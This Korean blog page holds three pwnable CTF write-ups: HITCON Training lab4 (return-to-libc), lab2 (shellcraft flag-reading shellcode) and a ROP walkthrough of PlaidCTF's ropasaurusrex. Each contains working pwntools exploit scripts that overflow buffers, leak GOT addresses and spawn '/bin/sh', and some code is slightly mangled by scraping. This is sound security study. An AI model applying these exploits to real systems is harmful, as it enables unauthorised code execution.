1. 시작하기전에...

이 풀이를 보시기 전에 앞서 블로깅한 글(rop)을 보고 와주시면 감사하겠습니다.


링크 : http://bachs.tistory.com/entry/NXNo-eXcutable-ROP?category=961837


return to libary는 함수의 리턴주소를 overflow를 이용하여 사용하고자 하는 함수의 주소로 덮어써 프로그램의 실행 플로우를 조작하는 것을 말합니다.

이 문제에서는 Print_message()의 리턴주소를 덮어썼습니다.


2. 분석


먼저, 문제에서 주어진 ret2lib.c파일을 살펴봅시다.


#include <stdio.h>
 
void See_something(unsigned int addr){
    int *address ;
    address = (int *)addr ;
    printf("The content of the address : %p\n",*address);
};
 
void Print_message(char *mesg){
    char buf[48];
    strcpy(buf,mesg);
    printf("Your message is : %s",buf);
}
 
int main(){
    char address[10] ;
    char message[256];
    unsigned int addr ;
    puts("###############################");
    puts("Do you know return to library ?");
    puts("###############################");
    puts("What do you want to see in memory?");
    printf("Give me an address (in dec) :");
    fflush(stdout);
    read(0,address,10);
    addr = strtol(address);
    See_something(addr) ;
    printf("Leave some message for me :");
    fflush(stdout);
    read(0,message,256);
    Print_message(message);
    puts("Thanks you ~");
    return 0 ; 
}


처음으로는 return to library에 대해 알고있는지 물어본 후 메모리 어떤 부분을 보고싶냐고 친절하게 물어봅니다.

알고 싶은 주소값을 던져주면 See_something()을 통해서 해당 주소에 어떤 값이 저장되어 있는지를 출력을 해주고있습니다.


그리고 남길말을 입력하라고하는데 이때 Print_message에서 Buffer Overflow를 발생시킬 수 있습니다.

Print_message의 인자로 입력할 남길말이 message변수에 담겨서 전달이 되는데 사이즈를 256바이트를 받습니다.

그리고 함수 내에서는 지역변수 48바이트짜리 버퍼에 카피를 하고있습니다.


함수 내 지역변수는 프로그램 스택에 저장이 되기 때문에 48바이트 공간에 256바이트를 카피하면 Overflow가 발생하게 되는 것이지요!

혹시 이해가 잘 안되신다면 앞선 블로깅들을 보고와주시기 바랍니다ㅠ


그럼 코드를 봤으니 gdb로 한번 까봅시다.

Print_message의 +6  에서 함수의 input으로 보이는 ebp+0x8을 eax에 넣고,

+9에서는 이 eax의 값을 esp+0x4 위치(스택 최상위 바로 아래)에 저장하고있습니다. 그리고

+13에서 eax에 지역변수 buf로 보이는 ebp-0x38을 저장한 후

+16에서 esp로 저장하고나서

+19에서 strcpy함수를 호출합니다.


결과적으로 정리하면 스택 최상위에는 ebp-0x38, 그 아래에 ebp+0x8이 각각 위치하고 strcpy가 호출 되는 거네요

c소스 중 strcpy(buf, mesg); 이 라인이 어셈으로 표현됐다고 보면 되겠습니다.


따라서, ebp-0x38(56)에 buf값이 저장될테고, 리턴 주소를 덮어 쓰려면 60개의 dummy가 필요하다는 계산이 나올 수 있습니다.

현재까지 분석한 스택의 상황을 그려보면 이런 모습이겠죠, dummy가 60바이트만큼 필요하단 건 buf size(56byte) + SFP(4byte)를 말씀드린 것입니다.


3. exploit


return to library를 하기위해서 준비할 것은 크게


1. Overflow로 덮어쓸 위치

2. 사용하고 싶은 함수와 기타 리소스 주소 알아내기


정도가 될 것 같습니다.

Overflow로 덮어쓸 위치는 구했고.. system("/bin/sh")를 사용할 거고, 따라서 필요한건 system함수의 주소, "/bin/sh"문자열의 주소를 알아내야합니다.


알아 낼 방법은 이 프로그램 내에서 특정 주소를 입력하면 그 값을 알려주기 때문에, 프로그램에서 사용된 puts의 got를 입력해 puts의 실제 함수 주소를 알아내고, 그 값을 기준으로 system 함수의 주소와 "/bin/sh"의 주소를 계산해 내도록 하겠습니다.


solv.py

1
2
3
4
5
6
7
8
9
100
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
 
= process('./ret2lib')
= ELF('./ret2lib')
 
#found address of puts got
log.info("found address of puts got : %s" % hex(e.got["puts"]))
puts_got = e.got["puts"]
 
p.recvuntil(":")
p.send(str(puts_got))
 
puts_addr = p.recvline()
puts_addr = int(puts_addr.split(":")[1].strip(), 16
 
sys_offset   = 0x24d40
binsh_offset = 0xfd548
 
system_addr = puts_addr - sys_offset
binsh_addr  = puts_addr + binsh_offset
 
log.info("address of puts : %s" % hex(puts_addr))
log.info("address of system : %s" % hex(system_addr))
log.info("address of /bin/sh string : %s" % hex(binsh_addr))
 
payload  = ""
payload += "a"*60 #dummy 60bytes
payload += p32(system_addr)
payload += "aaaa"
payload += p32(binsh_addr)
 
p.recvuntil(":")
p.send(payload)
p.interactive()



먼저 puts의 got를 알아내서 이 주소값을 프로그램에 전송하고, 결과로 실제 puts 함수의 주소를 알아냅니다.

그리고 이 값을 기준으로 system 함수의 offset과 "/bin/sh"문자열의 offset으로 계산하여 실제 주소들을 알아내는데,

offset은 이렇게 계산할 수 있습니다.

gdb로 프로그램을 실행 한 후 실행 당시의 주소 값들을 가지고 계산을 하는데, puts의 함수와 얼마나 떨어져 있는지를

offset으로 사용하여 프로그램 실행 당시에도 각각의 위치를 알아 낼 수 있는 것이지요.


계산이 끝났다면 이제 payload만 완성 시켜주면됩니다. 60개의 dummy를 넣고, system함수의 주소와 가상의 리턴 주소값(dummy) 그리고 system함수의 인자를 넣어주면 payload완성입니다.



끝!


1. 시작전에...

이번에 HICON Training을 CodeByO와 같이 풀어보기로했습니다. 저는 짝수번을 맡기로 하였고, 풀이 내용을 블로깅 할 예정입니다.


pwntools의 shellcraft를 이용하면 각 아키텍쳐(x86, amd64, arm, mips, ...)에 맞는 쉘코드를 손쉽게 만들어 사용할 수 있습니다.

낮은 번호의 문제라서 그런지 어떤 지식이 필요했다기 보다는 shellcode를 만들 수 있는 지를 확인 하는 것 같았습니다. 사실 풀이랄 것도 별로 없어요ㅠ


2.  분석

먼저 file명령어를 이용해서 어떤 파일인지 살펴보니까 ELF 32bit실행파일입니다.



실행파일이니까 실행을 한번 해봅시다.


실행하면 "Give my your shellcode:" 가 프린트 되고, 입력을 받습니다.

hello 라고 입력을 했더니 세그먼트 폴트가 나고 말았네요.


ida를 이용해서 디컴파일을 해보면


간단하게 메인 함수가 있습니다. 살펴보면 위에서 직접 실행하면서 봤던 Give my... 문자열을 print해준 후에 shellcode에 입력 값을 200byte넣어 준 후 아래에서 실행 하는 것 같습니다.



gdb(peda)로 한번 열어보겠습니다.

main+41 ~ 53까지를 보면 0xc8, 0x804a060, 0x0을 차례대로 스택에 push한 후 read함수를 호출하고 있습니다. 0xc8은 10진수로 200으로

ida에서 본 read(0, &shellcode, 200u); 부분이 되겠네요. 그리고 main+61, 66을보면 0x804a060을 eax에 넣고 call eax를 하고 있습니다.


우리가 Give my... 이후에 입력한 값은 0x804a060에 저장이 되고 결과적으로 main+66에서 call하게 되는 것이지요



따라서 Give my.. 이후에 적당한 쉘코드를 넣어주면 그 쉘코드가 실행이 될 것으로 보입니다.

문제에서 의도한 것은 원래 서버에 있는 flag를 읽는 것이지만, 현재 HITCON Training의 서버가 죽은 것으로 보여 local 환경에서 테스트 해보기로 합시다.


3. exploit


============solv.py============

from pwn import *

p = process('./orw.bin')

context(arch='i386', os='linux')

shellcode = ''

shellcode += shellcraft.pushstr('flag')

shellcode += shellcraft.open('esp', 0, 0)

shellcode += shellcraft.read('eax', 'esp', 100)

shellcode += shellcraft.write(1, 'esp', 100)

#log.info(shellcode)

p.recvuntil('Give my your shellcode:')

p.send(asm(shellcode))

log.success(p.recvline())

==============================



우리에게 필요한 것은 32bit환경의 쉘코드가 필요하므로 arch는 i386, os는 리눅스로 컨텍스트를 설정해 주고 난 다음
쉘코드를 만들 내용을 shellcraft를 이용해서 만듭니다.

shellcode += shellcraft.pushstr('flag') #open함수의 인자로 사용하기 위해 파일명을 push

shellcode += shellcraft.open('esp', 0, 0) #스택 최 상단에는 파일명이 있으므로, esp를 이용해서 open함수를 call

shellcode += shellcraft.read('eax', 'esp', 100) #open함수 호출 후 eax에 fd가 반환되므로 해당 fd에서 100byte만큼 읽어서 esp에 저장

shellcode += shellcraft.write(1, 'esp', 100) #write함수의 fd에 표준출력을 주어서 파일 내용을 출력




local에서 테스트하기 위해 생한 flag파일이 정상적으로 읽혀 출력되는 것을 확인 할 수 있습니다.



[추가] pwnable.kr 의 Toddler`s Bottle에 있는 asm문제가 유사하니 풀어보시는 것을 추천드립니다.


'Study > Pwnable' 카테고리의 다른 글

[HITCON Training] lab6 / Stack migration, Stack pivoting  (0) 2017.12.15
[HITCON Training] lab4 / return to library  (0) 2017.11.29
[HITCON Training] lab2 / shellcraft  (0) 2017.11.28
NX(No eXcutable) / ROP  (1) 2017.09.29
pwnable.kr / input / pwntools  (0) 2017.08.01
pwnable.kr passcode  (4) 2017.07.31

1. 시작전에..


기초적인 오버플로우를 이용하여 exploit 하는 것은 여러 메모리 기법에 의해 성공시키기 어렵습니다. 

이 때문에 ROP라는 기법을 통해서 exploit을 시도하는데요. 이번에 저도 말로만 들어왔던 ROP에 대해서 한번 알아보았습니다.

제가 참고했던 링크는 https://bpsecblog.wordpress.com/2016/03/12/pctf2013_ropasaurusrex/ 이 곳의 글을 주로 참고하였고,

사용했던 바이너리는 위 글에서 사용한 예제와 같이 2013년 plaidCTF에서 출제되었던  ropasaurusrex바이너리를 사용하였습니다.



2. 용어


먼저, 이 문제를 풀이하며 필요한 용어와 아이디어를 풀어봅시다!


2-1. NX(No eXecutable)

NX는 위에서 언급했던 메모리 기법 중 하나인데요, 메모리 페이지의 권한을 write권한과 excutable권한을 동시에 갖지 않도록 설정하는 방법입니다.


좀 더 설명을 하자면, 예를 들어 설명하자면 80짜리 버퍼가 있고, 오버플로우를 이용해서 버퍼(스택 공간)에 쉘코드 및 \x90으로 80만큼 채운 후 4바이트 sfp를 덮고, RET자리에 쉘코드 시작 주소를 넣는다고 가정해봅시다.


위의 그림과 같이 가정한대로 오버플로우를 이용해 RET주소를 쉘코드 시작주소로 덮어써주었습니다.

리턴주소가 쉘코드 시작주소로 덮어 써졌으므로 쉘코드가 실행되어 exploit이 가능하겠지요?


여기에 NX가 설정이 되어 있으면, 스택공간에 있는 저 쉘코드에 실행권한이 없어서 RET를 주소로 덮어써주어도!

실행권한이 없기 때문에 실행이 되지 않아 exploit이 불가하다 이런 개념입니다.


2-2) ROP(Return Oriented Programming)

현재 수행 중인 프로그램 코드 안에 존재하는 서브루틴이 리턴 명령어에 닿기 전에 선별된 기계 명령어 또는 기계 명령어 덩어리를 간접적으로 실행시키기 위해 콜스택의 제어를 통제하는 기술, 실행되는 모든 명령어들이 원래 프로그램 안에 존재하는 실행 가능한 메모리 영역에서 추출한 것들이기 때문에 실행가능하다!


[참조] http://shayete.tistory.com/entry/6-Return-Oriented-Programming


위에 써드린 참조 주소에 설명이 매우 잘되어있어요.. 심지어 영상 강의까지 있으니 도움이 많이 되실 듯 합니다.


참고로, 위에서 말한 선별된 기계 명령어 또는 기계 명령어 덩어리를 "가젯(gadget)"이라고 부릅니다.

사실 위에 설명만으로는 너무 추상적인 이야기이기 때문에 감이 잘 안오실껀데..(전 그랬거든요) 직접 어떻게 페이로드가 구성되는 지 보시면 바로 감이 올꺼에요


2-3) RTL Chain(Return To Library Chain)

함수가 호출 되는 과정을 살펴봅시다.

1. 함수 호출 전 스택에 차곡차곡 파라미터들을 push합니다. 

2. 다음 실행 명령어를 스택에 push한 후 해당 함수 주소로 jmp합니다.

3. 스택프레임을 구성하고 함수가 실행됩니다.

4. pop eip를 통해 다음 명령어 주소를 복구하여 다음을 진행합니다.


예를 들어 리턴 주소들(함수 주소들)이 차곡차곡 쌓여있는 아래와 같은 스택이 있다고 생각해봅시다.

"각 함수들이 아무 arguments를 받지 않는다"라고 가정한다면, 해당 스택을 가진 함수가 끝나고나면 RET1의 주소에 있는 함수를 호출 하게 되겠죠?

그리고 그 함수가 끝나고 나면 RET2의 주소에 있는 함수를 호출하게 될거에요, 그리고 그다음엔 RET3...

이렇게 호출하게 되는 이유는 함수 호출 전 다음 실행되는 명령어의 주소가 미리 push되어 있다는 가정하에 pop eip명령어를 통해 프로그램의 흐름을 제어 하기 때문에 이루어지게됩니다. 물론 실제로는 이렇게 구성되는 경우는 없다고 볼 수 있겠지만, 오버플로우가 가능한 상황에 우리가 임의로 이런 스택구조를 만들 수 있습니다.


그렇다면, 이런 스택 구조도 생각해 볼 수 있을거에요

RET1의 주소에 있는 함수가 하나의 argument를 전달받아야 한다면, 위와 같은 방식으로 arg1A값을 넣어서 전달 할 수 있어요,

마찬가지로 RET2의 주소에 있는 함수에 두 개의 arguments를 전달 할 수 있죠, 다만 차이가 있다면 argumnets와 RET주소 사이에 pop을 보셔야합니다.

argument들을 사용하기위해 스택에 쌓았지만 프로그램 흐름을 제어하기 위해서는 RET2를 pop하기 전에 스택에서 사라져 줘야한다는 것이지요

그렇게 하기 위해서 각 각 갯수에 맞추어 pop한 개, pop두 개가 실행 되는 "가젯"들이 필요한거에요.


한 셋트씩 뜯어서 보자면, RET주소 + arguments갯수만큼의 pop + ret하는 가젯의 주소 + arguments 이렇게 한 셋트로 묶어서 생각하시면 됩니다.

이러한 것들을 엮어서 만든 것이 chain 형태처럼 보이나요?


이 "가젯"들은 프로그램 안에 존재하는 것들을 찾아서 써야하고, 이런 가젯들을 찾기위해 여러가지 툴이 있습니다만, 저는 rp를 사용했습니다.

rp : https://github.com/0vercl0k/rp/downloads


RTL은 Return To Library로, 일반적으로 프로그램에서 사용하는 라이브러리안에 있는 함수를 리턴하여 공격하는 방식입니다.

가령 공격할 바이너리에 system함수가 없어도 기본적으로 사용하는 라이브러리안에 system함수가 있기때문에 이 주소를 찾아서 위의 체인안에 주소를 넣어주는 식으로 공격할 수 있습니다.


다만, ASLR(Address Space Layout Randomization)기법이 적용되어있다면 함수들의 주소가 실행 할 때마다 유동적으로 바뀌기 때문에 이 주소를 찾아줘야하는 수고가 필요 할 수 있습니다.


 

3. 분석

실제 예제를 분석해보면서 위에서 살펴본 개념들을 구체화해봅시다.



먼저 바이너리가 어떤상태인지 살펴보니까, elf 32bit바이너리네요. 동적링킹되어있고요.



실행하니까 입력을 받고 그냥 WIN이라는 문자열을 출력하고 끝내네요??



gdb로 열어서 main을 까보려고하니까 심볼테이블이 로드되지 않았다고하네요..

사실 저는 여기서부터 어떻게해야하나 막막했는데, 이럴땐 main의 주소를 알아내서 시작할 수 있습니다. IDA로 열어보면!



main을 찾을수 있죠? 그리고 옆엔 주소를 알수 있자나여?? 이 주소로 gdb로 까보면 까볼 수 있다 이겁니다.



짠! 요렇게요. 기왕 IDA로 열어봤으니까 짱짱좋은 hex-ray가지고 분석을 좀더 해보자고여.


디스어셈블했을 때도 알 수 있는 있지만, main은 별게 없어요. 어떤 함수 하나를 호출 한 다음에 그저 WIN이라는 문자열을 write함수를 통해

출력해줄 뿐이죠.


원래 저 함수는 임의의 문자열로 되어있는데 저는 분석하기 편하도록 vulnFunc라는 이름으로 수정해주었습니다.

그럼 vulnFunc함수를 볼까요?


 

첫 번째 라인에서 char buf; // [sp+10h] [bp-88h]@1 로 버퍼의 사이즈가 스택에 0x88만큼 할당이 되고 있는 것을 알 수 있고,

두 번째 라인에서 return read(0, &buf, 0x100u); , read함수를 통해 표준입력으로 0x100만큼 입력을 받고 있는 것을 볼 수 있죠?

여기서 BOF를 이용해 스택을 조작할 수 있겠습니다.


0x88은 십진수로 136이잖아요? 그렇다면 vulnfunc함수 안에서 스택의 모양은 아래 처럼 예상해 볼 수 있을 거에요


우린 여기서 RET를 덮어서 RTL Chain을 엮어가지고 exploit을 할꺼잖아요? 구체적으로 어떻게 하면 좋을 지, 거기엔 무엇이 필요한 지 한번

봅시다.


우선, 우리가 호출하고 싶은 건 system("/bin/sh"); 잖아요?

"/bin/sh" 문자열은 프로그램 내에 없을 테니까 이 문자열을 어딘가에 임의로 써주어야겠죠?


그리고 system()의 주소가 필요하죠. 여기서는 서버에 aslr환경이 적용되어있다고 가정 하여 실행 시 주소가 매번 변경된다고 가정하겠습니다.

즉, 그냥 system()의 주소가 필요한 것이 아니라 바이너리를 실행할 당시의 system()주소가 필요합니다.


근데 프로그램 내부에서는 system함수를 쓰고있지 않기 때문에 프로그램에서 사용하는 read함수 주소(got주소)를 얻어내서 offset을 계산 한 후

이 offset을 이용해서 system함수의 주소(got주소)를 읽어와야합니다.


got에 대한 내용은 아래를 참조해주세요.


PLT와 GOT자세히 알기-1

https://bpsecblog.wordpress.com/2016/03/07/about_got_plt_1/


PLT와 GOT자세히 알기-2

https://bpsecblog.wordpress.com/2016/03/09/about_got_plt_2/


메모리에서 어떤 값을 써주어야하고, 읽어와야하기 때문에 read, write함수를 써야할거에여. read, write를 호출하려면 read, write의 plt주소를 알아와야해요. 알아온 주소로 chain을 구성할 수 있을거에요. 


read와 write는 모두 인자를 3개를 받고 있기 때문에, pop pop pop ret; 형태의 가젯의 주소 또한 필요하겠네요!


read / write를 연달아 호출하는 RTL Chain은 아래와 비슷한 형태가 되겠지요


그렇다면 결론적으로 필요한 것이 어떤 것들이 있는 지 정리를 해보고 필요한 것들을 모아봅시다.


1. read / write의 plt

2. pop을 세 번한 후 ret하는 가젯

3. 프로그램 실행 당시의 system함수의 got

4. 메모리에 "/bin/sh" 문자열을 써야함



익스플로잇 코드는 pwntools모듈을 통해 짜볼껀데, 여기에 plt와 got를 한방에 알아내는 아주 좋은 기능이 있으니 1번은 생략합시다.

가젯은 위에서 얘기한데로 rp를 이용해서 찾아볼거에여

rp -f [file path] -r [gadget`s maximun size] 로 사용할 수 있으니, 우리는


rp -f ./ropasaurusrex -r 4 로 실행을 해보면!!


결과 중 빨간 네모칸에 보이는 저 가젯을 찾을 수 있습니다. 


전 처음에 이 가젯을 보고 ebp값을 건드리기 때문에 스택프레임이 깨지면서 segfault가 나지 않을까 고민을 곰곰히 해봤는데, 어차피 chain을 통해 계속 스택프레임이 재구성되기 때문에 문제가 없을 거라는 결론을 내렸고 실제로도 이상이 없었어요.


자자 그럼 가젯도 모았고, 이제 프로그램 실행 당시의 system함수의 got는 어찌 구하느냐!

요건 미리 돌려보고 기준점을 삼을 함수를 하나 선정해서 offset을 계산해야해요, 전 read의 got를 기준으로 잡았고 이것으로 offset을 계산을 할거에요.



※프로그램을 실행해야 테이블이 로드되면서 주소를 알 수 있어요. 적당한 곳에 브레이크 포인트를 잡고 실행 한 후 찾아주세요.


빨간 네모친 부분에 read / system 함수의 got주소가 있죠? offset은 0xf7ec4c60(read) - 0xf7e28b40(system) = 0x9c120 이 되겠네요!

마지막으로 system함수의 인자로 필요한 "/bin/sh"문자열을 쓰는건 RTL Chain을 이용해서 쓰도록 해야할텐데, 기본적으로 data나 bss영역에 쓴다고 하던데.. 



위에 그림은 objdump - x ./ropasaurusrex  로 섹션정보를 출력한거에요.


첫 번째로 나오는 놈이 사이즈인데 23. data섹션과 24. bss섹션은 8바이트밖에 안되져 ㅠㅠ 너무작아서 쓰기 힘들 것 같습니다. 

20. dynamic 섹션은 다이나믹 링킹과정에 필요한 섹션이라고 하는데.. 여기서는 건드려도 무방하다고만 알고있어요... elf구조는 아직 뜯어보지 못하여서 잘모르겠습니다.


어쨌든! dynamic 섹션에 쓰면 될 거 같고, 요 섹션의 주소 또한 pwntools에서 쉽게 얻어낼 수 있습니다.


그럼 이제 어떻게 익스플로잇을 하는 지 코드를 한번 볼까요?


4. exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from pwn import *
proc = process('/root/workspace/system_hack/challenge/ropasaurusrex/ropasaurusrex')
= ELF('/root/workspace/system_hack/challenge/ropasaurusrex/ropasaurusrex')
 
binsh = "/bin/sh"
 
#puzzle pieces
log.info("found address of .dynamic section : %s" % hex(e.get_section_by_name(".dynamic").header.sh_addr))
ds_section = e.get_section_by_name(".dynamic").header.sh_addr
 
log.info("found address of read plt : %s" % hex(e.plt["read"]))
read_plt = e.plt["read"]
 
log.info("found address of read got : %s" % hex(e.got["read"]))
read_got = e.got["read"]
 
log.info("found address of write plt : %s" % hex(e.plt["write"]))
write_plt = e.plt["write"]
 
log.info("found address of write got : %s" % hex(e.got["write"]))
write_got = e.got["write"]
 
#real address of read func - real address of system func
offset = 0x9c120
 
#080484b6: pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
pppr = 0x080484b6
 
#payload
#step 1. writing /bin/sh in .dynamic section
payload  = "\x90"*140
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)   #stdin
payload += p32(ds_section)
payload += p32(len(binsh))
 
#step 2. reading address of read`s got
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)   #stdout
payload += p32(read_got)
payload += p32(len(str(read_got)))
 
#step 3. overwrite read got to system func
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)   #stdin
payload += p32(read_got)
payload += p32(len(str(read_got)))
 
#step 4. call system function
payload += p32(read_plt)
payload += p32(0xaaaabbbb)
payload += p32(ds_section)
 
proc.send(payload + "\n")
proc.send(binsh)
 
read_address = proc.recv(4)
system_address = u32(read_address) - offset
 
log.info("read address   = %x" % u32(read_address))
log.info("system address = %x" % system_address)
 
proc.send(p32(system_address))
 
log.info("Exploit is Success!!")
proc.interactive()



항상 그래왔듯이 결과부터 보자구여!

proc = process('/root/workspace/system_hack/challenge/ropasaurusrex/ropasaurusrex')

이 줄은 바이너리를 실행 해서 프로세스를 생성하는 줄이에요


= ELF('/root/workspace/system_hack/challenge/ropasaurusrex/ropasaurusrex')

해당 파일을 elf format으로 읽어주는 줄이고,


#puzzle pieces
log.info("found address of .dynamic section : %s" % hex(e.get_section_by_name(".dynamic").header.sh_addr))
ds_section = e.get_section_by_name(".dynamic").header.sh_addr
 
log.info("found address of read plt : %s" % hex(e.plt["read"]))
read_plt = e.plt["read"]
 
log.info("found address of read got : %s" % hex(e.got["read"]))
read_got = e.got["read"]
 
log.info("found address of write plt : %s" % hex(e.plt["write"]))
write_plt = e.plt["write"]
 
log.info("found address of write got : %s" % hex(e.got["write"]))
write_got = e.got["write"]


이 부분에서 pwntools의 파워풀함을 알 수 있죠, 위처럼 elf로 파일을 읽으면 각 섹션주소와 plt와 got의 주소를 한방에 알아낼 수 있습니다.

그 아래에서는 우리가 찾아낸 offset과 가젯의 주소를 선언해 주었습니다.


페이로드가 만들어지는 부분을 살펴볼까요?


#step 1. writing /bin/sh in .dynamic section
payload  = "\x90"*140
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)   #stdin
payload += p32(ds_section)
payload += p32(len(binsh))


스텝 1에서는 read 함수를 이용해서 "/bin/sh"문자열을 .dynamic section에 써주는 부분이에요, 먼저 BOF를 내기위해 더미 140바이트(buf size(0x88, 136) + sfp(4))를 써주었고,

리턴 주소를 read의 plt로 덮어주어서 read함수를 호출했어요, 그리고 인자정리를 위한 pppr을 넣어주고 "/bin/sh"를 입력해주기 위해 stdin의 fd인 0을 넣어주었습니다.

그리고 ds_section의 주소를 넣어주고, "/bin/sh"문자열의 length를 넣어주었죠


#step 2. reading address of read`s got

payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)   #stdout
payload += p32(read_got)
payload += p32(len(str(read_got)))


스텝 2에서는 같은 형식으로 표준 출력으로 read의 got주소를 출력해주게 했어요 프로그램 실행당시의 주소를 알아야하기때문에 이렇게 알아낸거죠 


※위처럼 표준 입출력을 통해 프로세스와 인터렉션하는 부분은 아래에 나와요, 페이로드에서는 인터렉션을 하기 위한 구조(?)를 만든다고 생각하시면 됩니다.


#step 3. overwrite read got to system func
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)   #stdin
payload += p32(read_got)
payload += p32(len(str(read_got)))


스텝 3에서는 스텝 2에서 알아낸 read함수의 got주소를 가지고 offset으로 계산한 후 전달한 system함수의 got주소를 read함수의 got에 덮어쓰는 부분이에요, 덮어 쓴다음에 read함수를 호출하면 system함수가 호출되게 하기 위해서에요


#step 4. call system function
payload += p32(read_plt)
payload += p32(0xaaaabbbb)
payload += p32(ds_section)


스텝 4에서는 read함수를 호출하는데, 인자로 ds_section의 주소 즉, "/bin/sh"를 전달해요, 인자 전달전에 중간에 더미로 0xaaaabbbb를 전달해서 구조를 맞춰 줍니다.



5. 결과


이제야 ROP가 뭔지 개념정도는 알게 된거 같네요, 익숙해지도록 다른 문제들도 열심히 풀어봐야겠습니다!

'Study > Pwnable' 카테고리의 다른 글

[HITCON Training] lab4 / return to library  (0) 2017.11.29
[HITCON Training] lab2 / shellcraft  (0) 2017.11.28
NX(No eXcutable) / ROP  (1) 2017.09.29
pwnable.kr / input / pwntools  (0) 2017.08.01
pwnable.kr passcode  (4) 2017.07.31
PEDA / pwnable.kr bof문제  (0) 2017.07.12
  1. nop 2019.05.07 17:58

    read나 write는 안그러는데 왜 system() 만 offset으로 접근하나요?

+ Recent posts